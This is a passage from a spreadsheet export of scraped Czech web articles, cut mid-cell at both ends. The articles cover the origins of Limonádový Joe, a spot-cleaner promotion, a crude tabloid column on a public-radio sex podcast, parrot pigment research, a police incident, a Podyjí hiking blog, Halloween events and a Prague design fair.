vznikat Limonádový Joe v první verzi. Otec miloval romantiku Divokého západu a hodně o něm věděl. Hltal Hawksovy a Fordovy westerny, kde vystupovali civilní, a přesto romantičtí hrdinové. Žili v nekonečně velké a svobodné zemi. Mohli odjet, kdy a kam chtěli. To všechno otec a jeho přátelé tehdy ani později za komunismu nemohli a romantika westernů je unášela pryč od skutečnosti. Otce začalo zajímat, jaké byly pravé osudy mužů opředených legendou: Billa Hickoka, Jesseho Jamese , Wyatta Earpa. Byl jejich znalec. Ve společnosti kolem redaktorů Melantrichu dával jejich příběhy k lepšímu, a tak ho požádali, aby napsal sérii povídek parodujících „kaubojky“. Charakter hrdiny Redaktoři určili charakter hrdiny: měl být tak pozitivní, až by to bylo stupidní. Nato otec přišel s doplňujícím nápadem: pistolník je tak všestranně kladný, že odmítá alkohol , ale ve skutečnosti je přestrojeným cesťákem prodávajícím limonádu. Joeova dobrodružství Nemožná Joeova dobrodružství se odehrávají na pozadí historicky věrně vykreslených postav a událostí. Téma si samo řeklo o šroubovaně vzletný jazyk, který Brdečka užíval nejen pro legraci, ale asi i proto, aby text byl delší. Povídky sám ilustroval. Limonádový Joe začal v Praze žít vlastním životem. Režisér Josef Šmída časopisecký seriál zdramatizoval v divadle Větrník v budově U Topičů a doplnil jej dialogy z dobré Chisholmovy kovbojky Žlutý kůň. Otce se nezeptal, zda je mu to vhod, a brzy kromě nadšených kritik přišlo i obvinění z plagiátu. Malinké divadlo mělo ale každý večer vyprodáno a představení sršela energií, takže se otec podle svých slov přes tu nepříjemnost lehce přenesl. Šmídova zapomenutá inscenace předznamenala sérii pozdějších dramatizací, které už dělal otec sám. Vždycky ale zdůrazňoval, že bez Šmídova nápadu by další dramatické úpravy těžko vznikly. Souběžně vznikala na objednávku nakladatele Hynka kniha Limonádový Joe v podobě, v jaké vychází dodnes. Otec měl Joea velmi rád, ale jeho úspěchu se nikdy nepřestal divit. Dnes víme, že za tím úspěchem stojí jeho schopnost skloubit romantiku, legraci a ironii, čemuž u nás porozumí každý. Zdroj: RADIOSERVIS, A.S. Související Autor: Eliška Mrázová Autor person Eliška Mrázová Rubrika transition_slide Knihy</t>
  </si>
  <si>
    <t>1870</t>
  </si>
  <si>
    <t>20241101_203_3244361580_af9d7f65a231084d35ea.html</t>
  </si>
  <si>
    <t>af9d7f65a231084d35ea</t>
  </si>
  <si>
    <t>Nejnovější kupón pro výkonnější verzi! GOOVI Spot Cleaner je jeden z mála dostupných tepovačů z Číny, má sací sílu 15 KPa a výbornou cenu</t>
  </si>
  <si>
    <t>Nejnovější kupón pro výkonnější verzi! GOOVI Spot Cleaner je jeden z mála dostupných tepovačů z Číny , má sací sílu 15 KPa a výbornou cenu GOOVI Spot Cleaner je chytrý přenosný čistič skvrn na koberce a čalouněný nábytek za dostupnou cenu. Dokáže odstranit fleky pomocí vody a přípravku rychle a efektivně. Nejvýkonnější verze s novým kuponem! TIP: Poštovné zcela zdarma. Sací výkon až 11 KPa A díky sacímu výkonu 15 Kpa / 11 KPa (750 W / 450 W verze) s ním můžeš vyčistit i ty nejodolnější skvrny. Ať už jde o čokoládové fleky od dětí nebo fleky od červeného vína po páteční párty, tento tepovač je připraven k akci. Praktické odstranění skvrn Se zásobníkem na čistou vodu o objemu 1080 ml a zásobníkem na odpadní vodu s objemem 800 ml tento stroj umožňuje delší čištění bez nutnosti neustálého doplňování vody. GOOVI Spot Cleaner je vybaven technologií 2 nádrží , neboli efektivně odděluje čistou vodu od špinavé. Tím zajistí, že tepování bude vždy hygienicky čisté. GOOVI Spot Cleaner nabízí systém All-in-one Function , který spojuje sílu stříkání pod tlakem, efektivní čištění kartáčem a výkonné sací schopnosti do jednoho kompaktního přístroje. Každá sedačka tak může získat zpět svůj původní šarm. A to i bez únavného drhnutí kartáčem! Praktický a pohodlný – takový je GOOVI Spot Cleaner Díky kabelu dlouhému 5,5 m a hadici s konektorem dlouhým 1,4 m , co je dohromady téměř 7 metrů dosahu , se tento tepovač dostane i tam, kde jeho konkurenti ne. A to, aniž by si ho musel propojit do druhé zásuvky. A s váhou jen 4,5 kg je příjemný na manipulaci, což ocení každý, kdo nemá chuť na zápas s těžkými a robustními tepovači. S praktickou rukojetí pro přenášení se tento čistič skvrn stává přenosným pomocníkem v boji proti skvrnám. Zvládne tepování iv autě! Spolehlivě vyčistí skvrny na autokoberečcích a autosedačkách.</t>
  </si>
  <si>
    <t>886</t>
  </si>
  <si>
    <t>504</t>
  </si>
  <si>
    <t>20241101_204_3244218292_5789a9a55d335047687c.html</t>
  </si>
  <si>
    <t>5789a9a55d335047687c</t>
  </si>
  <si>
    <t>Linda Bartošová je krásná jako fisting</t>
  </si>
  <si>
    <t>Linda Bartošová je krásná jako fisting Linda Bartošová je krásná žena. Zdroj: ČTK / Ryšánek Marcel Linda Bartošová má svůj podcast. Zdroj: Tomáš Zezulka / SM / Profimedia Linda Bartošová v show Jana Krause . Zdroj: Show Jana Krause Daria Kascheeva a Linda Bartošová . Zdroj: ČTK / Říhová Michaela Linda Bartošová je sexy. Zdroj: Profimedia.cz/ ČTK Linda Bartošová v show Jana Krause . Zdroj: Show Jana Krause Linda Bartošová je krásná žena. Zdroj: ČTK / Ryšánek Marcel Linda Bartošová má svůj podcast. Zdroj: Tomáš Zezulka / SM / Profimedia Linda Bartošová v show Jana Krause . Zdroj: Show Jana Krause Daria Kascheeva a Linda Bartošová . Zdroj: ČTK / Říhová Michaela Linda Bartošová je sexy. Zdroj: Profimedia.cz/ ČTK Linda Bartošová v show Jana Krause . Zdroj: Show Jana Krause NÁZOR: Novinářka a bývalá účastnice soutěží krásy Linda Bartošová spustila na rádiu Wawe podcast s názvem Slast. Jedná se o povídání o ženské sexualitě a rozkoši. Kritici Lindě (a vedení Českého rozhlasu) vyčítají, že takový pořad by neměl vznikat za peníze daňových poplatníků. Má takový pořad ve veřejnoprávním vysílání své místo? Na média veřejné služby je upřený kritický pohled, protože na jejich chod přispíváme finančně. Generální ředitel Českého rozhlasu René Zavoral dokonce chce, aby výše koncesionářských poplatků narostla - psali jsme ZDE. Do této debaty přichází Slast Lindy Bartošové . Je otázkou, zda podcast Lindy Bartošové je něco, na co bychom měli přispívat. Část veřejnosti říká, že určitě ne. Že točit podcasty o tom, jak orgasmus prožívají ženy, nepatří do ranku veřejnoprávnosti. Novinář a bavič Luděk Staněk například kritizuje i to, že rádio Wawe si reklamu na kontroverzní podcast zaplatilo u společnosti Meta a fotka polonahé Lindy Bartošové na nás nyní vyskakuje z Facebooku . Další ale namítají, že ženská sexualita je téma, které část veřejnosti zajímá. Je povídání o dráždění klitorisu a vlhké sliznici dostatečně veřejnoprávní? A co je vlastně dostatečně veřejnoprávní? A post shared by Linda Bartošová (@lindabartosova) Obhájci Lindy Bartošové říkají, že Český rozhlas točí reportáže také o curlingu, sochách z písku či pěstování banánovníku. Ano, všechna tato témata si najdou své posluchače. Někdy jich je sotva pár stovek, ale bylo by nespravedlivé říct, že reportáž o curlingu nikoho nezaujala. Stejně tak je nespravedlivé říct, že nikoho nezajímá ženská slast. Ženské orgasmy mají své fanoušky stejně jako nakládání feferonek, sbírání zátek od piva či chov osmáka degu. Přitahuje vás vlastní sestra či matka? Incest je mnohem běžnější, než si umíte představit Otázkou je míra. Jak moc se má Český rozhlas za naše peníze věnovat ženské slasti? Neměl by přidat více reportáží o korejském baletu? Neměli bychom raději poslouchat napínavé zápasy ve stolním tenisu mezi Ostrovem a Českými Budějovicemi ? Nelze uspokojit všechny a nelze se snažit uspokojit všechny posluchače za naše peníze. Takže někdo má rád vdolky a jiný třeba holky. A někdo má úplně jiné koníčky. Na komerčním webu Blesk.cz třeba dva roky běží podcast s názvem Už budu. Je to také o slasti a také o tom, jak mít lepší a silnější orgasmy. Mezi pozvanými hosty se objevil například charismatický Master Drex. To je pán, který se živí tím, že klientům zasouvá do análního otvoru ruce či různé předměty. Proč to Blesk.cz vysílá? Protože může, protože roztahování análního otvoru zajímá plno lidí, protože Blesku vyšla analýza, že takový pořad má ekonomický smysl, protože Blesk si na takový pořad vydělal a tak s ním šel na trh. 5 důvodů, proč ženy milují dělat orální sex. Co je na tom tolik vzrušuje? Český rozhlas přichází na trh s pořadem, na který přispěli daňoví poplatníci ze zákona a Český rozhlas tímto pořadem bude konkurovat všem podcastům, které řeší erotiku, orgasmy, úchylky a sex. Představte si, že přijde den a Linda si do Slasti pozve pana Drexe a budou si povídat o fistingu. Kdy roztahovat, komu roztahovat, čím roztahovat, kolika lidem lze roztahovat najednou... Ano, opět si takový díl své posluchače najde. MOHLO BY VÁS ZAJÍMAT: Ředitel Českého rozhlasu Zavoral si hraje na soudce aneb Kdo je tady gangster Pokud tedy na veřejnoprávní rozhlasovou stanici patří Bartošová a její orgasmy, patří tam i Master Drex a jeho orgasmy (a orgasmy jeho klientů)? Odpovězte si sami. Za sebe říkám, že někdo má rád vdolky a jiný holky. Někdo má rád orálek a někdo raději análek. Pro někoho je svůdná Linda a pro někoho pořádný fisting. Nenechme se zmást, Slast Lindy Bartošové není pro chod České republiky ani o chlup zásadnější než slast Mastera Drexe! Paris Hilton opět provokuje. Ve spodním prádle předvedla dokonalé tělo: Sdílejte článek Štítky orgasmus Český rozhlas ženské tělo Linda Bartošová René Zavoral slast fisting Master Drex Vybrali jsme pro vás Autor: FTV Prima</t>
  </si>
  <si>
    <t>1320</t>
  </si>
  <si>
    <t>1560</t>
  </si>
  <si>
    <t>20241101_205_3342772984_cd0f565f2d010ee513d9.html</t>
  </si>
  <si>
    <t>cd0f565f2d010ee513d9</t>
  </si>
  <si>
    <t>Záhada papouščích barev rozluštěna</t>
  </si>
  <si>
    <t>Shrnutí Záhada papouščích barev rozluštěna 1. listopadu 2024 Jak vzniká zbarvení papouščího peří? Odpověď přináší v nové studii publikované v časopise Science mezinárodní badatelský tým. Výzkum vedli vědci z portugalského BIOPOLIS-CIBIO a zapojeni jsou do něj i čeští badatelé, včetně doc. Petera Mojzeše z Fyzikálního ústavu UK. Papoušci by mohli být synonymem pro barevnost: téměř všechny druhy jsou výrazně zbarvené, a to zejména červeně nebo žlutě. Zelená barva je vlastně také žlutá, ale na modrém pozadí. Už na konci 19. století bylo jasné, že barviva v peří papoušků jsou odlišná od všech ostatních červených a žlutých pigmentů vyskytujících se v peří ptáků či srsti jiných zvířat. Dostala proto svá vlastní pojmenování. Červenému pigmentu se říkalo „Araroth“ a žlutý pigment měl označení „Psittakofulvin“. Označení psittakofulviny se nakonec vžilo pro všechny papouščí pigmenty a teprve na začátku 21. století byla odhalena jejich detailní chemická struktura. Avšak až do dnešního dne se pouze spekulovalo o tom, jak přesně žlutá a červená barva papoušků vlastně vzniká. Je snad rozdíl v uspořádání pigmentů v peří, nebo ve velikosti molekul psittakofulvinů? Nyní se ukázalo, oproti původní představě psittakofulvinů jako jedné látky, že opravdu existují dvě chemické formy těchto barviv. Jedna z nich, tzv. aldehyd, byla známa právě již od roku 2001. Druhou formu vědecký tým potvrdil ve své nové studii. Navíc nová studie odhaluje detailní molekulární mechanismus, díky kterému dochází k přeměně aldehydového psittakofulvinu na karboxylovou kyselinu. Oproti předchozím výzkumům tak nyní už víme, že papouščí pigmenty vznikají nejen spojováním krátkých 2 až 3 uhlíkových molekul proteinem polyketid syntetáza, ale i to, že primárním výsledkem syntézy není karboxylová kyselina, ale právě aldehyd, který je na karboxylovou kyselinu řízeně upravován. „To byla jedna z nesrovnalostí, která nás vedla k tomu, že musí existovat opravdu dvě formy psittakofulvinů. Předchozí molekulární studie totiž nedokázala vysvětlit, co je výsledkem syntézy, protože by to musela být jiná forma psittakofulvinu, než kterou všechny ostatní studie nacházely v peří papoušků. Zřejmě to bylo tím, že jedni si vybrali žlutého papouška, zatímco všichni před nimi studovali papouška červeného,“ vysvětluje d. Jindřich Brejcha z Přírodovědecké fakulty UK. Modelovým druhem pro studii byl indonéský druh papouška lori, který se v přírodě vyskytuje ve dvou morfách – žlutě a červeně zbarvené, lori tmavý (Pseudeos fuscata). „Naši kolegové si vybírají pro své molekulární studie modely, o kterých se ví, že jejich genom bude stejný a jediný rozdíl bude právě zodpovědný za konkrétní fenotypový znak. Pro takové studie jsou polymorfní druhy vynikající, ale u papoušků je vnitrodruhový polymorfismus bohužel vzácný,“ vysvětluje volbu modelového druhu Jindřich Brejcha . Portugalský tým začal sekvenovat genom obou barevných variant tohoto papouška a hledat, které úseky DNA by mohly být zodpovědné za rozdíly ve zbarvení. Výsledkem bylo vytipování oblasti zodpovědné za regulaci aktivity naprosto běžného proteinu, aldehyd dehydrogenázy ALDH3A2. Aldehyd dehydrogenázy jsou rodina velice běžných proteinů, které nalézáme napříč všemi organismy. U člověka jsou například naprosto zásadní při přeměně alkoholů přes jedovaté aldehydy na neškodné karboxylové kyseliny. Dysfunkce ALDH3A2 je u člověka také zodpovědná za dědičnou kožní chorobu provázenou neurologickými symptomy, tzv. Sjögren-Larssonův syndrom. První měření papouščího peří pomocí Ramanovy mikroskopie na Matematicko- fyzikální fakultě UK ukázalo, že červená a žlutá barva peří se zřejmě opravdu liší délkou řetězců. „Poloha nejintenzivnějších pásů v Ramanových spektrech dobře korelovala s barvou peří i očekávanou délkou řetězců, ale na druhou stranu, jejich extrémní intenzita znemožňovala detekci slabších vibračních pásů, které by nám řekly více o jiných funkčních skupinách,“ shrnuje tuto část experimentů docent Peter Mojzeš. Pomocí chromatografie a hmotnostní spektrometrie ale Petr Maršík s Jindřichem Brejchou našli nečekaně velkou diverzitu látek, kterou nepředpokládali. „Díky znalosti genu nás napadlo, že se musíme se podívat i na koncové funkční skupiny molekul psittakofulvinů, a proto jsme udělali srovnání mezi červeným a žlutým peřím mnoha druhů papoušků. Pomocí separace kapalinovou chromatografií spojenou s kombinací metod hmotnostní spektrometrie s ultravysokým rozlišením a UV-Vis absorpční spektroskopie se nám podařilo prokázat přítomnost dvou funkčních skupin – aldehydické a karboxylové – a zároveň potvrdit vztah mezi funkční skupinou psittakofulvinu a barvou peří. Za peří z mnohdy velmi vzácných druhů vděčíme chovatelům, plzeňské Zoo nebo záchranné stanici pro opuštěné papoušky Laguna,“ popisuje další postup dr. Petr Maršík z České zemědělské univerzity. Povedlo se tak získat vzorky například od chráněného novozélandského papouška nestor kea či peří podivného druhu papouška, trichy orlí. Výsledky ukázaly, že pro výsledné zbarvení peří napříč všemi liniemi papoušků je zásadní rozdíl v poměru aldehydů a karboxylových kyselin. Analýza exprese genů ukázala, že v červeném peří se aldehyddehydrogenáza vytváří méně a aldehyd, který enzym přeměňuje, se v něm proto kumuluje. Naopak, ve žlutém a zeleném peří se aldehyd efektivně odbourává, protože aldehydázy je zde dostatek. Výsledkem je vyšší podíl karboxylové kyseliny v žlutém peří. Další molekulární analýzy například odhalily, že ve chvíli, kdy se peří formuje a zřejmě dochází k syntéze psittakofulvinů, je DNA v oblasti genu ADLH3A2 rozpojená, co značí, že se gen přepisuje. V neposlední řadě se pomocí sekvenování na úrovni jednotlivých buněk v tkáni podařilo ukázat, že ADLH3A2 se přepisuje přímo v buňkách, které budou tvořit peří. Toto zjištění je jeden z prvních přímých důkazů o tom, jak se pigment do peří dostává. „Ve chvíli, kdy jsme měli jednotlivé výsledky, zbývalo už jen nějakým jednoznačným způsobem ověřit, že náš protein opravdu dělá to, co si myslíme,“ vysvětluje další kroky studie Jindřich Brejcha . Na experimentu s buněčnými kulturami pivních kvasinek pracovali čeští vědci společně s vědeckým týmem z USA . „Kolegové kvasinky upravili tak, že produkovaly psittakofulviny. Jenže kvasinky mají vlastní aldehydázy, a tak jsme nejdříve produkci aldehydu nepozorovali. Pokud se ale všechny aldehydázy kvasinek zablokovaly, aldehydy se objevily. Jakmile se kvasinkám zabudovala do genomu papouščí ALDH3A2, začala v nich pracovat a aldehydy štěpit na karboxylové kyseliny. Při měření jsme navíc objevili další meziprodukty syntetické dráhy, což doplnilo naši představu o celkové syntéze psittakofulvinů,“ popisuje konečný důkaz Jindřich Brejcha . Podle autorů ale nejsou ještě všechna tajemství papouščího zbarvení odhalena a jejich výzkum otevírá další otázky. Jedním z nevysvětlených tajemství tak zůstává, proč vlastně papoušci vytvářejí své barvy úplně jinak než všechny ostatní organismy. Odkaz na studii: Arbore, R. et al. (2024). A molecular mechanism for bright color variation in parrots. Science. DOI: https://doi.org/10.1126/science.adp7710 PŘF UK</t>
  </si>
  <si>
    <t>20241101_206_3243905485_58049183fe608a81e4ea.html</t>
  </si>
  <si>
    <t>58049183fe608a81e4ea</t>
  </si>
  <si>
    <t>Strážníci z Veltrus dopadli ve Zlosyni na Mělnicku muže s plynovkou</t>
  </si>
  <si>
    <t>Strážníci z Veltrus dopadli ve Zlosyni na Mělnicku muže s plynovkou Foto: MP Veltrusy Středočeský kraj Ve čtvrtek, okolo 10. hodiny dopoledne, byla na tísňové lince přijata informace o muži, který na okraji obce Zlosyň na Mělnicku sedí v autě, popíjí a má u sebe zbraň. Na místo ihned vyjely nejbližší hlídky Policie ČR a také hlídka Městské policie Veltrusy . Právě veltruští strážníci byli na místě jako první. „Městská policie Veltrusy , ve složení str. Bc. Maršík a prap. Havránková, zadržela a zajistila do příjezdu Policie ČR ozbrojeného muže pod vlivem alkoholu a omamných a psychotropních látek,“ uvedli strážníci. Přivolaní policisté zjistili, že muž zbraní nikoho neohrožoval, a že se jedná o plynovou pistoli. „U 36letého muže byla následně nalezena látka připomínající drogy. Muž byl zadržen a celou věcí se policisté i nadále zabývají,“ sdělil policejní mluvčí Pavel Truxa. Petr Marek, Týdeník Policie Autor: Pavel Jaňurek Autor person Pavel Jaňurek Rubrika transition_slide Události</t>
  </si>
  <si>
    <t>20241101_207_3244353835_072d0fbc7154f748f338.html</t>
  </si>
  <si>
    <t>072d0fbc7154f748f338</t>
  </si>
  <si>
    <t>Stezka Českem se psem – NP Podyjí 3</t>
  </si>
  <si>
    <t>Stezka Českem se psem – NP Podyjí 3 před 1 týdnem zobrazeno 77 krát Domů » Cestování se psem » Stezka Českem se psem – NP Podyjí 3 Hardegg a pašeráckou stezkou do Vranova nad Dyjí Po rychlé snídani jedeme autem na nádraží, odkud nám jede autobus do Lukova . Stíháme to přesně na vteřinu. Uff. Z Lukova Dnes to vypadá na krásný den, sluníčko svítí. Dnes jsme nic neponechaly náhodě a vzaly jsme si lahev červeného vína . Když už jsme na té Moravě , akorát víno je italské. Přejdeme vesnici a směřujeme kolem polí na lesní cestu. Z lukova Doctor se za námi plahočí a je nějaký divný. Změna stravy na cestě mu trochu pochroumala střeva. Zvrací. Ajjaj. Necháme ho chvíli odpočinout a sledujeme ho. Vypadá už dobře a tak vyrážíme. Pokračujeme kolem malého Čížovského rybníka na rozcestí. Do Čížova je to na druhou stranu než potřebujeme, ale nakonec ten 1 km zacházky jdeme. Čížovský rybník Čížov Po pravé straně u bývalého sídla pohraniční roty se nachází Památník železné opony. Je umístěn podél bývalé tzv. signální silnice, kterou používala Pohraniční stráž v zakázaném pásmu poblíž československo-rakouských hranic. Jedná se o bývalou část drátěného zátarasu přibližně 3 km od státní hranice. Původně se do poloviny šedesátých let drátěného zátarasu z ostnatého drátu pouštěl elektrický proud. Vybudován byl v první polovině padesátých let na základě zákona č. 69/1951 Sb., o ochraně státních hranic. Poslední verze železné opony v Československu na západních hranicích pochází ze 70. let. Skládala se z drátěného zátarasu, signální stěny s nízkým napětím, oraným pásem ošetřovaným herbicidy a obslužnou asfaltovou komunikací. Hardegg Je zde otevřená hospoda a začínají tady proudit davy turistů. Jdeme na polévku a pivo . Vracíme se na rozcestí a pokračujeme po modré turistické značce na vyhlídku Hardegg . Hardeggská vyhlídka (Hardegger Warte) je vyhlídka v NP Podyjí . Krásná vyhlídka s malým altánkem na vršku skály vysoké 90 metrů, odtud je vidět na údolí řeky Dyje a na rakouské město Hardegg . Nad městem se tyčí hrad Hardegg . vyhlídka Hardegg Vracíme se zpět a ještě se cheme podívat do městečka Hardegg ,, které je nejmenším městem v Rakousku . Jdeme po okruhu, dolů jdeme po silnici. Přicházíme kolem dvou bunkrů na hraniční ocelový příhradový most z konce 19. Století. Spolu s (v návrhu doplněnou) prvorepublikovou stavbou celnice se zabudovanou pevnostní stavbou z 30. let 20. století představuje ojedinělou dvojici kvalitních historických stavebních děl s významnou architektonickou a zejména kulturně-historickou hodnotou. Z mostu je krásný pohled na řeku a hrad Hardegg . Zpět jdeme kolem řeky Dyje a poté stoupáme lesem až dojdeme na rozcestí. Podzimní přenádherná cesta. řeka Dyje Hardegg Další část cesty směrem na Vranov nad Dyjí Pokračujeme Pašeráckou stezkou část cesty prochází po úzkém skalním chodníku vysoko nad údolím pod členitou skálou. Pohybovat se tady je nutné s velkou opatrností, ale výhled z vyhlídky na řeku Dyji pak stojí opravdu za to! vyhlídka na Pašerácké stezce Další vyhlídka je Ledové sluje v nadm. výšce 430 etrů. Vyhlídka Ledové sluje nese název podle jeskyní, které se ve svazích pod vyhlídkou nacházejí. Odtud je výhled směrem na Vranov nad Dyjí . Stojí tu obelisk vztyčený na počest hraběnky Heleny Lubomírské-Mniszkové, která roku 1859 zpřístupnila tuto část údolí veřejnosti. na Pašerácké stezce U Mahrovy studánky se Doctor občerství přímo z roury a pak už pomalu sestupujeme k řece Dyji a téměř za tmy dorazíme do Vranova nad Dyjí . Dnes jsme ušly 22 km. na Pašerácké stezce V hospodě si po zásluze dáme dobré jídlo a v 18 hodin nám jede poslední autobus do Znojma . zámek Vranov nad Dyjí Tady končí náš třídenní výlet části Stezky Českem. Za 2,5 dne jsme ušli krásných 50 km a moc si to užily. Z lukova Autor: Jana Schlitzová Autor person Jana Schlitzová</t>
  </si>
  <si>
    <t>405</t>
  </si>
  <si>
    <t>120</t>
  </si>
  <si>
    <t>20241101_208_3243858118_4579f704c23fe6bdf77a.html</t>
  </si>
  <si>
    <t>4579f704c23fe6bdf77a</t>
  </si>
  <si>
    <t>Halloween na Chebsku, víme, kam za strašidly</t>
  </si>
  <si>
    <t>Halloween na Chebsku , víme, kam za strašidly Strašidelný večer na hradě Vildštejn Hrad Vildštejn opět připravil večer plný strašidelné atmosféry a zábavy. Program zahrnuje lampionový průvod, soutěže a tematická překvapení. Kromě toho Hodovna hradu nabídne speciální halloweenské menu. Kdy: 31. října–3. listopadu, 16:00–22:00 Kde: Hrad Vildštejn , Skalná Vstupné: 120 Kč pro dětský program Malování na obličej a tělo v Salonu Dahlia V Salonu Dahlia ve Františkových Lázních si můžete nechat namalovat obličej nebo tělo s halloweenským motivem. Malování je vhodné i pro děti a cena za tuto službu je 100 Kč. Občerstvení je zajištěno. Kdy: 1. listopadu od 14:00 Kde: Salon Dahlia, Františkovy Lázně Cena: 100 Kč Volný čas Halloween párty pro teenagery v clubu Cihellna Aš Pro mladé od 12 do 18 let je připravena večerní halloweenská párty bez alkoholu v ašském clubu Cihellna. Přijďte si užít tematický večer plný hudby a zábavy. Kdy: 1. listopadu, 17:00–22:00 Kde: Club Cihellna Aš Strašně strašidelná cesta Obecní úřad Dolní Žandov zve na strašidelnou cestu pro děti a jejich rodiče. Akce zahrnuje noční stezku s lampiony a baterkami, na které si děti mohou užít halloweenskou atmosféru. Na konci stezky čeká teplý nápoj a špekáček zdarma. Kdy: 1. listopadu, 17:30–19:30 Kde: ZŠ a MŠ Dolní Žandov (spojovací chodba k jídelně) Dětská Halloween párty v Roxy music &amp;amp; bowling baru Roxy music &amp;amp; bowling bar zve děti na halloweenskou párty s DJ Pancikem, animací a soutěží o nejlepší masku. Událost je veřejná a vítá malé i větší účastníky v kostýmech. Kdy: 2. listopadu, 16:00–18:30 Kde: Roxy music &amp;amp; bowling bar, Mariánské Lázně Dušičková stezka na zámečku Kopaniny Pro ty, kdo chtějí spojit Halloween s atmosférou Dušiček, je připravena trasa na Kopaninách. Na konci stezky se mohou účastníci občerstvit na komunitním pikniku, kde je možné přinést vlastní jídlo. Pro děti jsou připraveny špekáčky (100 ks). Kdy: 2. listopadu, 17:00–19:00 Kde: Zámeček Kopaniny Zprávy Noční stezka Tradiční Halloween v DDM Sova Cheb slibuje stezku plnou úkolů, tajemných překvapení, tvořivé dílny a strašidelný foto koutek. Pro účastníky v kostýmech je připraven stánek s občerstvením, a večer uzavře ohňová show. Vstup s doprovodem rodičů je vítán. Kdy: 2. listopadu, 18:00–20:00 Kde: DDM Sova Cheb Strašidelná cesta pro malé i velké Oblíbená akce - Halloween, aneb strašidelná cesta okolo Labutího jezírka pro malé i velké. Masky a lampióny jsou vítány. S sebou baterky. Start i cíl na dvoře knihovny. V případě deště se akce ruší. Kdy: 2. listopadu, 18:00 Kde: Městská knihovna, Františkovy Lázně Sraz nemrtvých Každoroční sraz nemrtvých, polomrtvých a mrtvých láká všechny, kdo si chtějí užít Halloween naplno. Stačí si obléknout strašidelný kostým a dorazit. Kdy: 2. listopadu, 18:00 Kde: bar V Sadu, Masarykovo náměstí, Aš Autor: Pavla Sofilkaničová Autor person Pavla Sofilkaničová</t>
  </si>
  <si>
    <t>8820</t>
  </si>
  <si>
    <t>20241101_209_3243820624_63c261fedf4349dbd5f6.html</t>
  </si>
  <si>
    <t>63c261fedf4349dbd5f6</t>
  </si>
  <si>
    <t>Jedenáctý LEMARKET přivítá 200 značek a umělců v budově bývalých elektrických podniků WPP Campus.</t>
  </si>
  <si>
    <t>Jedenáctý LEMARKET přivítá 200 značek a umělců v budově bývalých elektrických podniků WPP Campus. Moderní tržiště LEMARKET, které představuje a podporuje českou tvorbu, vstoupilo do druhé dekády. V letošním roce zaplní o dvou víkendech 7. a 8. prosince a 14. a 15. prosince rekonstruovanou budovu WPP Campus u stanice metra Vltavská, do které se běžně veřejnost nedostane. V budově, která v roce 2021 získala ocenění Stavba roku, najdou návštěvníci nejen více než 200 lokálních značek, designérů a umělců, ale i prostor pro odpočinek a relaxaci. Součástí obou víkendů bude vedle gastro zóny a bohatého doprovodného programu i možnost profesionálního líčení, tetování a workshopy. LEMARKET pokračuje ve své misi objevovat a představovat to nejlepší z lokální tvorby. Každý ze dvou víkendů nabídne přes 100 pečlivě vybraných značek, přičemž pouze 30 z nich se bude oba termíny opakovat. „ Návštěvníci tak budou mít jedinečnou příležitost objevit během obou víkendů zcela nové tvůrce a značky jako jsou například Ententyky, Soolista, Nikola Zezulová, Michaela Lada, Artistka nebo Kayu. Zároveň jsme program obohatili o řadu služeb, které zpříjemní celkový zážitek z návštěvy. Ať už jde o tetovací salón nebo péče o krk, ruce a obličej se značkou Bioorganica,“ říká organizátorka Elena Janota . Oceněné prostory WPP Campus, dříve Orco Bubenská, jsou důvěrně známé tvůrčí komunitě. Mnoho značek zde v minulosti mělo své ateliéry a showroomy a LEMARKET sám v ní po několik let sídlil. Budova se s LEMARKETEM promění v designové tržiště s originální atmosférou. Citlivá rekonstrukce budovy zachovala řadu původních architektonických prvků, které vytváří jedinečné prostředí pro prezentaci současného designu. Mezi vystavovateli nebudou chybět etablované české značky jako je například udržitelná oděvní značka Weconcept, výrobci českých parfémů a vůní do interiérů Perfumed Prague a Oraculum a designéři a designérky jako jsou šperkařka Eliška Lhotská a Ela Chroust, výrobci kožených doplňků about leather nebo brýlařské studio Optiqua. Nejen ty doplní začínající tvůrci a přibližně desetina vystavovatelů přijede ze Slovenska . Rekonstruovaná budova WPP Campus u stanice metra Vltavská Novinkou letošního ročníku je rozšířená nabídka služeb pro návštěvníky. V prostorách marketu naleznou tetovací salon, relaxační zónu s masážemi od Biorganica zaměřenými na péči o krk, ruce a obličej, služby vizážistky s možností líčení a poradenství, a profesionální balení dárků. Významnou součástí je také nová dobročinná zóna, kde se zdarma představí charitativní projekty SPOLUŽIVOT, METRÁŽ a ELPIDA. O gastronomické zážitky se postará kurátorovaný výběr značek. Návštěvníci ochutnají vína od ALMA WINES, pečivo z pekárny La Forme, speciality od Sweet &amp;amp; Pepper Days, kávu od Onesip Coffee a Dvakratdva, japonské speciality Neko Onigirazu, sladkosti z pardubické cukrárny Epifany a osvěžující nápoje od Herbert Sirupy. Kulturní program, který bude moderovat Šimon Bilina , nabídne pestrý mix žánrů. Na pódiu se vystřídají Adam Vopička, Sbor ELPIDA, dětský sbor HLÁSKY a večerní atmosféru dokreslí DJ set. V programu bude také benefiční divadelní představení, kterým budou moc lidé podpořit vybraný charitativní projekt. LEMARKET se uskuteční během dvou prosincových víkendů (7. – 8. 12. a 14. – 15. 12.) v prostorách WPP Campus . Vstupné činí 150 Kč na den nebo 250 Kč na celý víkend. Děti do 15 let a senioři mají vstup zdarma. Sledujte již nyní web https://www.lemarket.cz/ a Instagram https://www.instagram.com/lemarketcz/ pro více informací Comments comments Autor: Krystof Roedling Autor person Krystof Roedling</t>
  </si>
  <si>
    <t>1090</t>
  </si>
  <si>
    <t>976000</t>
  </si>
  <si>
    <t>20241101_21_3265271214_c5129caad9fdc2a1d327.html</t>
  </si>
  <si>
    <t>c5129caad9fdc2a1d327</t>
  </si>
  <si>
    <t>Střední školy na Vysočině nabídnou od září studentům tři nové obory</t>
  </si>
  <si>
